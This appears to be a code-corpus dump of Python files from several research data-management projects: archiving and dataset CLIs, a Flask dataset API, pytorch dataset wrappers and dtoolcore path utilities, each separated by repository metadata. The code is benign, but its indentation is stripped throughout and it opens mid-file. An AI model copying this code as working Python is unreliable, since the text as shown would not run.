def loads(data, *args, **kwargs):
return json.loads(data, *args, **kwargs)
``` |
{
"source": "jicarretero/SimpleDataModelsImplementation",
"score": 2
} |
#### File: GuardAgent/swagger_client/GuardAgentSecurityContext.py
```python
class GuardAgentSecurityContext(object):
class __GuardAgentSecurityContext:
def __init__(self):
# self._time_between_probes=Configuration("time_between_probes", "int", "Time consumed between probing in seconds", "60")
# self._time_between_pings=Configuration("time_between_pings","int", "time ellapsed between two pings in seconds", "60")
# self.configurations=Configurations([self._time_between_probes, self._time_between_pings])
pass
def to_dict(self):
return self.configurations.to_dict()
def to_str(self):
return self.configurations.to_str()
def time_between_probes(self,tbp: int=None):
if tbp is None:
return int(self._time_between_probes._value)
else:
self._time_between_probes._value = str(tbp)
def time_between_pings(self,tbp: int=None):
if tbp is None:
return int(self._time_between_pings._value)
else:
self._time_between_pings._value = str(tbp)
instance=None
def __new__(cls, *args, **kwargs):
if GuardAgentSecurityContext.instance is None:
GuardAgentSecurityContext.instance = GuardAgentSecurityContext.__GuardAgentSecurityContext()
return GuardAgentSecurityContext.instance
def __getattr__(self, name):
return getattr(self.instance, name)
def __setattr__(self, name, value):
return setattr(self.instance, name, value)
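# Minimal usage sketch (illustrative, not part of the original module):
# __new__ always hands back the shared inner instance, so repeated
# construction yields the very same object.
if __name__ == "__main__":
    ctx_a = GuardAgentSecurityContext()
    ctx_b = GuardAgentSecurityContext()
    assert ctx_a is ctx_b  # both names refer to the single shared context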
``` |
{
"source": "JIC-CSB/arctool",
"score": 2
} |
#### File: arctool/arctool/cli.py
```python
import sys
import os
import getpass
import click
from dtool import (
DataSet,
Project,
DtoolTypeError,
NotDtoolObject,
)
from arctool import __version__
from arctool.utils import (
README_SCHEMA,
readme_yml_is_valid,
new_archive_dataset,
)
from arctool.archive import (
ArchiveDataSet,
ArchiveFile,
ArchiveFileBuilder,
compress_archive,
)
from arctool.slurm import generate_slurm_script
from dtool.clickutils import create_project, generate_descriptive_metadata
from fluent import sender
logger = sender.FluentSender('arctool', host='v0679', port=24224)
@click.group()
@click.version_option(version=__version__)
@click.option('--fluentd-host', envvar='FLUENTD_HOST', default='v0679')
def cli(fluentd_host):
logger = sender.FluentSender('arctool', host=fluentd_host, port=24224)
message = {'api-version': __version__,
'command_line': sys.argv,
'unix_username': getpass.getuser()}
logger.emit('cli_command', message)
@cli.group(invoke_without_command=True)
@click.pass_context
@click.option('--staging_path',
help='Path to staging area where new project will be created',
default='.',
type=click.Path(exists=True))
def new(ctx, staging_path):
# ctx is passed in via @click.pass_context
# Makes default behaviour for 'arctool new' be create dataset
if ctx.invoked_subcommand is None:
try:
project = Project.from_path(staging_path)
project_path = staging_path
except NotDtoolObject:
project = create_project(staging_path)
project_path = os.path.join(staging_path, project.name)
except DtoolTypeError:
raise(click.UsageError("Don't create a project in a dataset"))
cli_new_dataset(project_path)
@new.command()
@click.option('--staging_path',
help='Path to staging area where new project will be created',
default='.',
type=click.Path(exists=True))
def project(staging_path):
create_project(staging_path)
@new.command()
@click.option('--staging_path',
help='Path to staging area where new archive will be created',
default='.',
type=click.Path(exists=True))
def dataset(staging_path):
cli_new_dataset(staging_path)
def cli_new_dataset(staging_path):
staging_path = os.path.abspath(staging_path)
click.secho('Starting new archive in: ', nl=False)
click.secho(staging_path, fg='green')
logger.emit('pre_new_archive', {'staging_path': staging_path})
descriptive_metadata = generate_descriptive_metadata(
README_SCHEMA, staging_path)
dataset, dataset_path, readme_path = new_archive_dataset(
staging_path, descriptive_metadata)
click.secho('Created new archive in: ', nl=False)
click.secho(dataset_path, fg='green')
log_data = {'metadata': descriptive_metadata,
'archive_path': dataset_path,
'dataset_uuid': dataset.uuid}
logger.emit('new', log_data)
archive_data_path = os.path.join(dataset_path, dataset.data_directory)
click.secho('Now:')
click.secho(' 1. Edit {}'.format(readme_path), fg='yellow')
click.secho(' 2. Move archive data into {}'.format(archive_data_path),
fg='yellow')
click.secho('Then: ', nl=False)
click.secho('arctool manifest create {}'.format(dataset_path),
fg='cyan')
@cli.group()
def manifest():
pass
@manifest.command()
# Note: click arguments do not accept a help string, so the description is
# kept as an inline comment.
@click.argument('path',  # path to archive dataset directory
type=click.Path(exists=True))
def create(path):
archive_dataset = ArchiveDataSet.from_path(path)
log_data = {'uuid': archive_dataset.uuid, 'path': path}
logger.emit('pre_create_manifest', log_data)
archive_dataset.update_manifest()
click.secho('Created manifest', fg='green')
log_data = {'uuid': archive_dataset.uuid,
'manifest': archive_dataset.manifest}
logger.emit('post_create_manifest', log_data)
click.secho('Next: ', nl=False)
click.secho('arctool archive create {}'.format(path), fg='cyan')
@cli.group()
def archive():
pass
@archive.command() # NOQA
@click.argument('path',  # path to dataset directory
type=click.Path(exists=True))
def create(path):
path = os.path.abspath(path)
dataset = DataSet.from_path(path)
log_data = {'path': path,
'dataset_uuid': dataset.uuid}
logger.emit('pre_create_archive', log_data)
readme_path = dataset.abs_readme_path
click.secho('Validating readme at: ', nl=False)
click.secho(readme_path, fg='green')
readme_str = open(readme_path, "r").read()
if not readme_yml_is_valid(readme_str):
click.secho("Not valid", fg='red')
sys.exit(2)
archive_builder = ArchiveFileBuilder.from_path(path)
hacked_path = os.path.join(path, "..")
tar_file_path = archive_builder.persist_to_tar(hacked_path)
# tar_file_path = dtool.arctool.initialise_archive(path)
# def show_func(item):
# if item is None:
# return ''
# return str(item['path'])
# with click.progressbar(manifest_filedict,
# length=tot_size,
# item_show_func=show_func) as bar:
# for entry in bar:
# rpath = os.path.join('archive', entry['path'])
# append_to_tar_archive(path, rpath)
# bar.update(entry['size'])
click.secho('Archiving data at: ', nl=False)
click.secho(path, fg='green')
click.secho('Created archive: ', nl=False)
click.secho(tar_file_path, fg='green')
archive_size = os.stat(tar_file_path).st_size
post_tar_log = {'dataset_uuid': dataset.uuid,
'archive_size': archive_size,
'output_tar_path': tar_file_path}
logger.emit('post_create_archive', post_tar_log)
click.secho('Next: ', nl=False)
click.secho('arctool archive compress {}'.format(tar_file_path), fg='cyan')
@archive.command()
@click.option('--cores', '-c', default=4, help='Number of CPU cores to use.')
@click.option('--slurm', '-s', is_flag=True, default=False,
help='Rather than running compression, generate SLURM script.')
@click.argument('path',  # path to uncompressed archive (tar) file
type=click.Path(exists=True))
def compress(path, cores, slurm):
path = os.path.abspath(path)
archive = ArchiveFile.from_file(path)
if not slurm:
click.secho('Compressing archive: ', nl=False)
click.secho(path, fg='green')
pre_log = {'dataset_uuid': archive.admin_metadata["uuid"],
'archive_path': path,
'cores': cores,
'tar_size': os.stat(path).st_size}
logger.emit('pre_compress_archive', pre_log)
compressed_archive_path = compress_archive(path, n_threads=cores)
click.secho('Created compressed file: ', nl=False)
click.secho(compressed_archive_path, fg='green')
post_log = {'dataset_uuid': archive.admin_metadata["uuid"],
'compressed_archive_path': compressed_archive_path,
'gzip_size': os.stat(compressed_archive_path).st_size}
logger.emit('post_compress_archive', post_log)
click.secho('Now:')
click.secho(' Move {} to archive storage'.format(
compressed_archive_path), fg='yellow')
# WARNING - be VERY careful automating this to submit the job - if the
# logic fails, the job will repeatedly submit itself forever!
else:
job_parameters = dict(n_cores=cores, partition="rg-sv")
command_string = "arctool archive compress -c {} {}".format(cores,
path)
submit_string = generate_slurm_script(command_string, job_parameters)
print(submit_string)
@cli.group()
def verify():
pass
@verify.command()
@click.argument('path',  # path to compressed archive
type=click.Path(exists=True))
def summary(path):
archive_file = ArchiveFile.from_file(path)
summary_data = archive_file.summarise()
size_in_gibi = float(summary_data['total_size']) / (2 ** 30)
click.secho("Archive contains", nl=False)
click.secho(" {} ".format(summary_data['n_files']), fg='green', nl=False)
click.secho("files.")
click.secho("Total uncompressed archive size is", nl=False)
click.secho(" {:.2f} GiB".format(size_in_gibi), fg='green', nl=False)
click.secho(".")
@verify.command()
@click.argument('path',  # path to compressed archive
type=click.Path(exists=True))
def full(path):
click.secho("Performing full verification on:", nl=False)
click.secho(" {}".format(path), fg='green')
archive_file = ArchiveFile.from_path(path)
result = archive_file.verify_all()
click.secho("Verification ", nl=False)
if result:
click.secho("passed", fg='green')
else:
click.secho("failed", fg='red')
if __name__ == "__main__":
cli()
```
#### File: arctool/tests/__init__.py
```python
import os
import shutil
import tempfile
from distutils.dir_util import copy_tree
import contextlib
import pytest
from dtool import DescriptiveMetadata
_HERE = os.path.dirname(__file__)
TEST_INPUT_DATA = os.path.join(_HERE, "data", "basic", "input")
TEST_DESCRIPTIVE_METADATA = DescriptiveMetadata([
("project_name", u"my_project"),
("dataset_name", u"brassica_rnaseq_reads"),
("confidential", False),
("personally_identifiable_information", False),
("owner_name", u"<NAME>"),
("owner_email", u"<EMAIL>"),
("unix_username", u"namey"),
("archive_date", u"2017-01-01"),
])
@contextlib.contextmanager
def remember_cwd():
cwd = os.getcwd()
try:
yield
finally:
os.chdir(cwd)
@pytest.fixture
def chdir_fixture(request):
d = tempfile.mkdtemp()
curdir = os.getcwd()
os.chdir(d)
@request.addfinalizer
def teardown():
os.chdir(curdir)
shutil.rmtree(d)
@pytest.fixture
def tmp_dir_fixture(request):
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def local_tmp_dir_fixture(request):
d = tempfile.mkdtemp(dir=_HERE)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def tmp_archive(request):
from arctool.archive import (
ArchiveDataSet,
ArchiveFileBuilder)
from arctool.archive import compress_archive
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
archive_directory_path = os.path.join(d, "brassica_rnaseq_reads")
os.mkdir(archive_directory_path)
archive_ds = ArchiveDataSet("brassica_rnaseq_reads")
archive_ds.persist_to_path(archive_directory_path)
# Move some data into the archive.
archive_input_path = os.path.join(TEST_INPUT_DATA, 'archive')
archive_output_path = os.path.join(archive_directory_path, 'archive')
copy_tree(archive_input_path, archive_output_path)
archive_builder = ArchiveFileBuilder.from_path(archive_directory_path)
tar_path = archive_builder.persist_to_tar(d)
compress_archive(tar_path)
return tar_path + '.gz'
```
#### File: arctool/tests/test_slurm_api.py
```python
def test_generate_slurm_submission_script():
from arctool.slurm import generate_slurm_script
job_parameters = {'n_cores': 8, 'partition': 'rg-sv'}
command_string = "arctool archive compress -c 8 /tmp/staging/mytar.tar"
actual_script = generate_slurm_script(command_string,
job_parameters)
actual = actual_script.split('\n')[-1]
expected = 'arctool archive compress -c 8 /tmp/staging/mytar.tar'
assert expected == actual, (expected, actual)
``` |
{
"source": "JIC-CSB/datademo",
"score": 2
} |
#### File: datademo/datademo/cli.py
```python
import os
import json
import click
import dtool
import pygments
import pygments.lexers
import pygments.formatters
from datademo import __version__
dataset_path_option = click.argument(
'path',  # path to dataset directory
default=".",
type=click.Path(exists=True))
project_path_option = click.argument(
'path',  # path to project directory
default=".",
type=click.Path(exists=True))
@click.group()
@click.version_option(version=__version__)
def cli():
pass
#############################################################################
# datademo dataset
#############################################################################
@cli.group()
def dataset():
pass
@dataset.command()
@dataset_path_option
def identifiers(path):
dataset = dtool.DataSet.from_path(path)
click.secho("\n".join(dataset.identifiers))
@dataset.command()
@dataset_path_option
def paths(path):
dataset = dtool.DataSet.from_path(path)
paths = [dataset.item_path_from_hash(identifier)
for identifier in dataset.identifiers]
click.secho('\n'.join(paths))
@dataset.command()
@dataset_path_option
def manifest(path):
dataset = dtool.DataSet.from_path(path)
formatted_json = json.dumps(dataset.manifest, indent=2)
colorful_json = pygments.highlight(
formatted_json,
pygments.lexers.JsonLexer(),
pygments.formatters.TerminalFormatter())
click.secho(colorful_json, nl=False)
@dataset.command()
@dataset_path_option
def summary(path):
dataset = dtool.DataSet.from_path(path)
file_list = dataset.manifest["file_list"]
total_size = sum([f["size"] for f in file_list])
json_lines = [
"{",
' "Name": "{}",'.format(dataset.name),
' "Creator": "{}",'.format(dataset.creator_username),
' "Number of files": {},'.format(len(file_list)),
' "Total size": {}'.format(total_size),
"}",
]
formatted_json = "\n".join(json_lines)
colorful_json = pygments.highlight(
formatted_json,
pygments.lexers.JsonLexer(),
pygments.formatters.TerminalFormatter())
click.secho(colorful_json, nl=False)
@dataset.command()
@dataset_path_option
def verify(path):
all_good = True
dataset = dtool.DataSet.from_path(path)
manifest_data_paths = []
for i in dataset.identifiers:
fpath = dataset.item_path_from_hash(i)
manifest_data_paths.append(fpath)
if not os.path.isfile(fpath):
click.secho("Missing file: {}".format(fpath), fg="red")
all_good = False
continue
calculated_hash = dataset._structural_metadata.hash_generator(fpath)
if i != calculated_hash:
click.secho("Altered file: {}".format(fpath), fg="red")
all_good = False
continue
abs_data_directory = os.path.join(path, dataset.data_directory)
existing_data_paths = []
for root, dirs, files in os.walk(abs_data_directory):
for f in files:
fpath = os.path.abspath(os.path.join(root, f))
existing_data_paths.append(fpath)
new_data_fpaths = set(existing_data_paths) - set(manifest_data_paths)
for fpath in new_data_fpaths:
all_good = False
click.secho("Unknown file: {}".format(fpath), fg="yellow")
if all_good:
click.secho("All good :)".format(fpath), fg="green")
#############################################################################
# datademo project
#############################################################################
@cli.group()
def project():
pass
@project.command() # NOQA
@project_path_option
def summary(path): # NOQA
project = dtool.Project.from_path(path)
num_datasets = 0
num_files = 0
tot_size = 0
child_paths = [os.path.join(path, p) for p in os.listdir(path)]
child_dirs = [d for d in child_paths if os.path.isdir(d)]
for d in child_dirs:
try:
dataset = dtool.DataSet.from_path(d)
except (dtool.DtoolTypeError, dtool.NotDtoolObject):
continue
file_list = dataset.manifest["file_list"]
size = sum([f["size"] for f in file_list])
num_datasets += 1
num_files += len(file_list)
tot_size += size
json_lines = [
"{",
' "Name": "{}",'.format(project.descriptive_metadata["project_name"]),
' "Number of datasets": {},'.format(num_datasets),
' "Number of files": {},'.format(num_files),
' "Total size": {}'.format(tot_size),
"}",
]
formatted_json = "\n".join(json_lines)
colorful_json = pygments.highlight(
formatted_json,
pygments.lexers.JsonLexer(),
pygments.formatters.TerminalFormatter())
click.secho(colorful_json, nl=False)
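# Illustrative invocation sketch (not part of the original module); the
# figures match the project fixture exercised in the accompanying CLI tests:
#   $ datademo project summary path/to/project
#   {
#     "Name": "crop_yield",
#     "Number of datasets": 3,
#     "Number of files": 9,
#     "Total size": 105
#   }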
```
#### File: datademo/tests/test_datademo_package.py
```python
def test_version_is_string():
import datademo
assert isinstance(datademo.__version__, str)
```
#### File: datademo/tests/test_datademo_project_cli.py
```python
import subprocess
from . import project_fixture # NOQA
def test_dataset_summary(project_fixture): # NOQA
import json
cmd = ["datademo", "project", "summary", project_fixture]
summary_str = subprocess.check_output(cmd).decode("utf-8")
summary = json.loads(summary_str)
expected = {
"Name": "crop_yield",
"Number of datasets": 3,
"Number of files": 9,
"Total size": 105,
}
assert summary == expected
``` |
{
"source": "JIC-CSB/dirods",
"score": 2
} |
#### File: dirods/tests/__init__.py
```python
import os
import shutil
import tempfile
import pytest
_HERE = os.path.dirname(__file__)
@pytest.fixture
def chdir_fixture(request):
d = tempfile.mkdtemp()
curdir = os.getcwd()
os.chdir(d)
@request.addfinalizer
def teardown():
os.chdir(curdir)
shutil.rmtree(d)
@pytest.fixture
def tmp_dir_fixture(request):
d = tempfile.mkdtemp()
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
@pytest.fixture
def local_tmp_dir_fixture(request):
d = tempfile.mkdtemp(dir=_HERE)
@request.addfinalizer
def teardown():
shutil.rmtree(d)
return d
``` |
{
"source": "JIC-CSB/dserve",
"score": 2
} |
#### File: dserve/dserve/__init__.py
```python
import os
from flask import (
Flask,
jsonify,
send_file,
abort,
request,
)
from flask_cors import CORS, cross_origin
app = Flask(__name__)
cors = CORS(app)
@app.route("/")
@cross_origin()
def root():
content = {
"_links": {
"self": {"href": "/"},
"items": {"href": "/items"},
"overlays": {"href": "/overlays"}
},
"uuid": app._dataset._admin_metadata["uuid"],
"dtool_version": app._dataset._admin_metadata["dtool_version"],
"name": app._dataset._admin_metadata["name"],
"creator_username": app._dataset._admin_metadata["creator_username"],
}
return jsonify(content)
def items_root():
items = []
for i in app._dataset.manifest["file_list"]:
item = {
"_links": {"self": {"href": "/items/{}".format(i["hash"])}},
"identifier": i["hash"],
}
items.append(item)
content = {
"_links": {
"self": {"href": "/items"},
},
"_embedded": {
"items": items,
}
}
return jsonify(content)
def specific_item(identifier):
try:
app._dataset.item_from_identifier(identifier)
except KeyError:
abort(404)
content = {
"_links": {
"self": {"href": "/items/{}".format(identifier)},
"content": {"href": "/items/{}/raw".format(identifier)},
"overlays": {"href": "/items/{}/overlays".format(identifier)},
},
}
overlays = app._dataset.access_overlays()
for overlay_name, overlay in overlays.items():
content[overlay_name] = overlay[identifier]
return jsonify(content)
@app.route("/items")
@app.route("/items/<identifier>")
@cross_origin()
def items(identifier=None):
if identifier is None:
return items_root()
else:
return specific_item(identifier)
@app.route("/items/<identifier>/raw")
@cross_origin()
def raw_item(identifier):
try:
item = app._dataset.item_from_identifier(identifier)
except KeyError:
abort(404)
item_path = os.path.join(
app._dataset._abs_path,
app._dataset.data_directory,
item["path"]
)
return send_file(item_path, item["mimetype"])
@app.route("/items/<identifier>/overlays")
@cross_origin()
def item_overlays(identifier):
try:
app._dataset.item_from_identifier(identifier)
except KeyError:
abort(404)
content = {
"_links": {
"self": {"href": "/items/{}/overlays".format(identifier)},
},
}
overlays = app._dataset.access_overlays()
for overlay_name in overlays.keys():
href = "/overlays/{}/{}".format(overlay_name, identifier)
content["_links"][overlay_name] = {"href": href}
return jsonify(content)
@app.route("/overlays/<overlay>/<identifier>", methods=["GET", "PUT"])
@cross_origin()
def item_overlay_content(overlay, identifier):
overlays = app._dataset.access_overlays()
try:
requested_overlay = overlays[overlay]
requested_overlay[identifier]
except KeyError:
abort(404)
if request.method == "PUT":
if not request.is_json:
abort(422)
new_value = request.get_json()
requested_overlay[identifier] = new_value
try:
app._dataset.persist_overlay(
overlay, requested_overlay, overwrite=True)
except KeyError:
abort(405)
return "", 201
elif request.method == "GET":
value = requested_overlay[identifier]
return jsonify(value)
def overlay_root():
overlays = app._dataset.access_overlays()
content = {
"_links": {
"self": {"href": "/overlays"}},
}
for overlay_name in overlays.keys():
value = {"href": "/overlays/{}".format(overlay_name)}
content["_links"][overlay_name] = value
return jsonify(content)
def specific_overlay(overlay_name):
overlays = app._dataset.access_overlays()
try:
overlay = overlays[overlay_name]
except KeyError:
abort(404)
return jsonify(overlay)
def create_new_overlay(overlay_name):
empty_overlay = app._dataset.empty_overlay()
try:
app._dataset.persist_overlay(overlay_name, empty_overlay)
except IOError:
abort(409)
return "", 201
@app.route("/overlays")
@app.route("/overlays/<overlay_name>", methods=["GET", "PUT"])
@cross_origin()
def overlays(overlay_name=None):
if overlay_name is None:
return overlay_root()
else:
if request.method == "PUT":
return create_new_overlay(overlay_name)
elif request.method == "GET":
return specific_overlay(overlay_name)
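# Minimal usage sketch (illustrative, not part of the original module):
# exercise the overlay routes with Flask's test client. It assumes
# app._dataset has already been attached to a served dataset, the
# identifier argument is a placeholder for a real item identifier, and
# Response.get_json assumes a reasonably recent Flask.
def _demo_overlay_round_trip(identifier):
    client = app.test_client()
    assert client.put("/overlays/demo").status_code == 201  # create empty overlay
    resp = client.put("/overlays/demo/{}".format(identifier), json={"note": "x"})
    assert resp.status_code == 201
    return client.get("/overlays/demo/{}".format(identifier)).get_json()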
``` |
{
"source": "JIC-CSB/dtoolai",
"score": 3
} |
#### File: dtoolai/dtoolai/data.py
```python
import logging
import torch.utils.data
import dtoolcore
import numpy as np
from PIL import Image
class WrappedDataSet(torch.utils.data.Dataset):
"""Subclass of pytorch Dataset that provides dtool DataSet methods.
This class mostly provides methods that consumers of DataSets require, and
passes those methods onto its internal DataSet object.
Args:
uri: URI for enclosed dtool DataSet.
"""
def __init__(self, uri):
self.dataset = dtoolcore.DataSet.from_uri(uri)
def put_overlay(self, overlay_name, overlay):
self.dataset.put_overlay(overlay_name, overlay)
def get_annotation(self, annotation_name):
return self.dataset.get_annotation(annotation_name)
@property
def name(self):
return self.dataset.name
@property
def uri(self):
return self.dataset.uri
@property
def uuid(self):
return self.dataset.uuid
def scaled_float_array_to_pil_image(array):
"""Convert an array of floats to a PIL image.
Args:
array (np.ndarray): Array representing an image. Expected to be float
and normalised between 0 and 1.
Returns:
A PIL Image object created from the array
"""
intarray = (255 * array).astype(np.uint8)
if len(array.shape) > 3:
raise ValueError(f"Can't handle array of shape {array.shape}")
if len(array.shape) == 2:
return Image.fromarray(intarray)
elif len(array.shape) == 3:
intarray = np.transpose(intarray, (1, 2, 0))
channels = intarray.shape[2]
if channels == 1:
return Image.fromarray(intarray.squeeze())
elif channels == 3:
return Image.fromarray(intarray)
else:
raise ValueError(f"Can't handle image with {channels} channels")
else:
raise ValueError(f"Can't handle array with shape {array.shape}")
def coerce_to_fixed_size_rgb(im, target_dim):
"""Convert a PIL image to a fixed size and 3 channel RGB format."""
if im.mode not in ['RGB', 'L']:
raise Exception(f"Unknown image mode: {im.mode}")
resized_im = im.resize(target_dim)
if im.mode == 'RGB':
return resized_im
return resized_im.convert('RGB')
class ImageDataSet(WrappedDataSet):
"""Class allowing a collection of images annotated with categories to be
used as both a Pytorch Dataset and a dtool DataSet."""
def __init__(self, uri, usetype='train'):
super().__init__(uri)
self.loaded_images = {}
self.cat_lookup = self.dataset.get_overlay('category')
self.cat_encoding = self.dataset.get_annotation('category_encoding')
self.image_dim = 256, 256
try:
usetype_overlay = self.dataset.get_overlay('usetype')
self.identifiers = [
idn for idn in self.dataset.identifiers
if usetype_overlay[idn] == usetype
]
except dtoolcore.DtoolCoreKeyError:
self.identifiers = self.dataset.identifiers
self.idn_lookup = {n: idn for n, idn in enumerate(self.identifiers)}
def __len__(self):
return len(self.identifiers)
def __getitem__(self, index):
idn = self.idn_lookup[index]
if idn not in self.loaded_images:
logging.debug(f"Loading {self.dataset.item_content_abspath(idn)}")
im = Image.open(self.dataset.item_content_abspath(idn))
resized_converted = coerce_to_fixed_size_rgb(im, self.image_dim)
channels_first = np.moveaxis(np.array(resized_converted), 2, 0)
self.loaded_images[idn] = channels_first.astype(np.float32) / 255
return self.loaded_images[idn], self.cat_encoding[self.cat_lookup[idn]]
@property
def input_channels(self):
return 3
@property
def dim(self):
return self.image_dim[0]
class TensorDataSet(WrappedDataSet):
"""Class that allows numpy arrays to be accessed as both a pytorch
Dataset and a dtool DataSet."""
def __init__(self, uri):
super().__init__(uri)
tensor_file_idn = self.dataset.get_annotation("tensor_file_idn")
npy_fpath = self.dataset.item_content_abspath(tensor_file_idn)
self.X = np.load(npy_fpath, mmap_mode=None)
labels_idn = dtoolcore.utils.generate_identifier("labels.npy")
labels_fpath = self.dataset.item_content_abspath(labels_idn)
self.y = np.load(labels_fpath, mmap_mode=None)
self.image_dim = self.dataset.get_annotation("image_dimensions")
self.tensor = self.X
self.labels = self.y
def __len__(self):
return self.tensor.shape[0]
def __getitem__(self, index):
raw = self.tensor[index]
scaledfloat = raw.astype(np.float32) / 255
label = self.labels[index]
return scaledfloat.reshape(*self.image_dim), int(label)
@property
def input_channels(self):
"""The number of channels each tensor provides."""
return self.image_dim[0]
@property
def dim(self):
"""The linear dimensions of the tensor, e.g. it is dim x dim in shape.
"""
return self.image_dim[1]
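# Minimal usage sketch (illustrative, not part of the original module):
# a TensorDataSet plugs straight into a torch DataLoader. The uri argument
# is a placeholder for the URI of a real tensor dataset.
def _demo_tensor_dataset_loader(uri):
    tds = TensorDataSet(uri)
    loader = torch.utils.data.DataLoader(tds, batch_size=4, shuffle=True)
    images, labels = next(iter(loader))
    return images.shape, labels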
def create_tensor_dataset_from_arrays(
output_base_uri, output_name, data_array, label_array, image_dim, readme_content
):
"""Create a dtool DataSet with the necessary annotations to be used as a
TensorDataSet.
Args:
output_base_uri: The base URI where the dataset will be created.
output_name: The name for the output dataset.
data_array (ndarray): The numpy array holding data.
label_array (ndarray): The numpy array holding labels.
image_dim (tuple): Dimensions to which input images should be reshaped.
readme_content (string): Content that will be used to create README.yml
in the created dataset.
Returns:
URI: The URI of the created dataset
"""
with dtoolcore.DataSetCreator(output_name, output_base_uri) as qds:
data_fpath = qds.prepare_staging_abspath_promise('data.npy')
np.save(data_fpath, data_array)
labels_fpath = qds.prepare_staging_abspath_promise('labels.npy')
np.save(labels_fpath, label_array)
data_idn = dtoolcore.utils.generate_identifier('data.npy')
qds.put_annotation("tensor_file_idn", data_idn)
qds.put_annotation("image_dimensions", image_dim)
qds.put_annotation("dtoolAI.inputtype", "TensorDataSet")
qds.put_readme(readme_content)
return qds.uri
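# Minimal usage sketch (illustrative, not part of the original module):
# package a tiny made-up tensor plus labels as a dtool DataSet. The
# output_base_uri argument and the "demo-tensor-ds" name are placeholders.
def _demo_create_tensor_dataset(output_base_uri):
    data = np.random.randint(0, 256, size=(4, 28 * 28), dtype=np.uint8)
    labels = np.array([0, 1, 2, 3], dtype=np.uint8)
    return create_tensor_dataset_from_arrays(
        output_base_uri, "demo-tensor-ds", data, labels,
        image_dim=(1, 28, 28), readme_content="# demo tensor dataset\n"
    )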
```
#### File: scripts/utils/copy_annotation.py
```python
import click
import dtoolcore
@click.command()
@click.argument('source_ds_uri')
@click.argument('dest_ds_uri')
@click.argument('annotation_name')
def main(source_ds_uri, dest_ds_uri, annotation_name):
source_ds = dtoolcore.DataSet.from_uri(source_ds_uri)
dest_ds = dtoolcore.DataSet.from_uri(dest_ds_uri)
annotation = source_ds.get_annotation(annotation_name)
dest_ds.put_annotation(annotation_name, annotation)
if __name__ == "__main__":
main()
```
#### File: scripts/utils/summarise_tensor_dataset.py
```python
from collections import Counter
import click
from dtoolai.data import TensorDataSet
@click.command()
@click.argument('dataset_uri')
def main(dataset_uri):
tds = TensorDataSet(dataset_uri)
print(f"Dataset has {len(tds)} items")
print(Counter(tds.labels))
if __name__ == "__main__":
main()
``` |
{
"source": "JIC-CSB/dtool-cli",
"score": 2
} |
#### File: dtool-cli/tests/test_dtool_cli_module.py
```python
from click.testing import CliRunner
def test_version_is_string():
import dtool_cli
assert isinstance(dtool_cli.__version__, str)
def test_dtool():
from dtool_cli.cli import dtool
runner = CliRunner()
result = runner.invoke(dtool)
assert result.exit_code == 0
``` |
{
"source": "JIC-CSB/dtoolcore",
"score": 2
} |
#### File: dtoolcore/dtoolcore/utils.py
```python
import os
import errno
import getpass
import hashlib
import json
import platform
import binascii
import base64
import datetime
import re
import socket
import logging
try:
from urlparse import urlparse, urlunparse
except ImportError:
from urllib.parse import urlparse, urlunparse
logger = logging.getLogger(__name__)
IS_WINDOWS = False
if platform.system() == "Windows":
IS_WINDOWS = True
DEFAULT_CONFIG_PATH = os.path.expanduser("~/.config/dtool/dtool.json")
DEFAULT_CACHE_PATH = os.path.expanduser("~/.cache/dtool")
MAX_NAME_LENGTH = 80
NAME_VALID_CHARS_LIST = ["0-9", "a-z", "A-Z", "-", "_", "."]
NAME_VALID_CHARS_STR = "".join(NAME_VALID_CHARS_LIST)
NAME_VALID_CHARS_REGEX = re.compile(r"^[{}]+$".format(NAME_VALID_CHARS_STR))
def windows_to_unix_path(win_path):
"""Return Unix path."""
logger.debug("In windows_to_unix_path...")
logger.debug("windows_to_unix_path.input_win_path: {}".format(win_path))
unix_path = win_path.replace("\\", "/")
# Deal with Windows path defect where path has incorrect starting /, e.g.
# /C:/some/path.
if IS_WINDOWS and len(unix_path) >= 3 and unix_path[0] == "/" and unix_path[2] == ":":  # NOQA
unix_path = unix_path[1:]
logger.debug("windows_to_unix_path.return: {}".format(unix_path))
return unix_path
def unix_to_windows_path(unix_path):
"""Return Windows path."""
logger.debug("In unix_to_windows_path...")
logger.debug("unix_to_windows_path.input_unix_path: {}".format(unix_path))
# Deal with Windows path defect where path has incorrect starting /, e.g.
# /C:/some/path.
if IS_WINDOWS and len(unix_path) >= 3 and unix_path[0] == "/" and unix_path[2] == ":":  # NOQA
unix_path = unix_path[1:]
win_path = unix_path.replace("/", "\\")
logger.debug("unix_to_windows_path.return: {}".format(win_path))
return win_path
def generous_parse_uri(uri):
"""Return a urlparse.ParseResult object with the results of parsing the
given URI. This has the same properties as the result of parse_uri.
When passed a relative path, it determines the absolute path, sets the
scheme to file, the netloc to localhost and returns a parse of the result.
"""
logger.debug("In generous_pase_uri...")
logger.debug("generous_pase_uri.input_uri: {}".format(uri))
parse_result = urlparse(uri)
IS_WINDOWS_DRIVE_LETTER = len(parse_result.scheme) == 1
if parse_result.scheme == '' or IS_WINDOWS_DRIVE_LETTER:
abspath = os.path.abspath(parse_result.path)
fixed_uri = "file://{}{}".format(
socket.gethostname(),
abspath
)
if IS_WINDOWS:
abspath = windows_to_unix_path(abspath)
if IS_WINDOWS_DRIVE_LETTER:
abspath = parse_result.scheme.upper() + abspath[1:]
fixed_uri = "file:///{}".format(abspath)
parse_result = urlparse(fixed_uri)
logger.debug("generouse_pase_uri.return: {}".format(parse_result))
return parse_result
def sanitise_uri(uri):
"""Return fully qualified uri from the input, which might be a relpath."""
logger.debug("In sanitise_uri...")
logger.debug("sanitise_uri.input_uri: {}".format(uri))
logger.debug("sanitise_uri.calling.utils.generouse_parse_uri")
uri = urlunparse(generous_parse_uri(uri))
logger.debug("sanitise_uri.return: {}".format(uri))
return uri
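# Minimal usage sketch (illustrative, not part of the original module):
# a bare relative path is promoted to a fully qualified file:// URI.
def _demo_sanitise_uri():
    uri = sanitise_uri("my_dataset")  # made-up relative path
    assert uri.startswith("file://")
    return uri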
def cross_platform_getuser(is_windows, no_username_in_env):
"""Return the username or "unknown".
The function returns "unknown" if the platform is windows
and the username environment variable is not set.
"""
if is_windows and no_username_in_env:
return "unknown"
return getpass.getuser()
def getuser():
"""Return the username."""
is_windows = platform.system() == "Windows"
no_username_in_env = os.environ.get("USERNAME") is None
return cross_platform_getuser(is_windows, no_username_in_env)
